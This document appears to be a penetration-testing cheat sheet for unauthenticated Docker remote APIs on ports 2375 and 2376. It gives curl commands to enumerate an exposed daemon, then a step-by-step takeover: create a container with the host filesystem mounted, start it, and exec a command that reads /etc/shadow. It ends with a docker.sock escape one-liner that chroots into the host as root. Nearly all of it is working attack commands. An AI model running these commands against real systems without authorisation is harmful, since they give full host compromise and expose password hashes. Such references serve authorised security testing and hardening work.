Docker API

What it is: Docker's remote management API. If exposed without authentication (which happens more than it should), you can create containers, mount the host filesystem, and escape to the host as root.

Default ports: 2375 (HTTP), 2376 (HTTPS)

Vuln research:


Check for exposed Docker API

Unauthenticated access — Full host compromise

curl http://$IP:2375/version
curl http://$IP:2375/containers/json
Example Output
{"Version":"20.10.7","ApiVersion":"1.41","Os":"linux","Arch":"amd64"}
If you see this = full Docker control without authentication

Mount host filesystem and get root

Create a container with host root mounted — Read/write everything

# List images:
curl http://$IP:2375/images/json

# Create container with host root mounted:
curl -X POST http://$IP:2375/containers/create -H "Content-Type: application/json" -d '{"Image":"<image_name>","Cmd":["/bin/bash"],"Binds":["/:/host"],"Tty":true}'

# Start container:
curl -X POST http://$IP:2375/containers/<container_id>/start

# Exec into container:
curl -X POST http://$IP:2375/containers/<container_id>/exec -H "Content-Type: application/json" -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true}'

Docker socket escape

If you're inside a container with /var/run/docker.sock mounted

# Check:
ls -la /var/run/docker.sock

# Use docker client inside container:
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host bash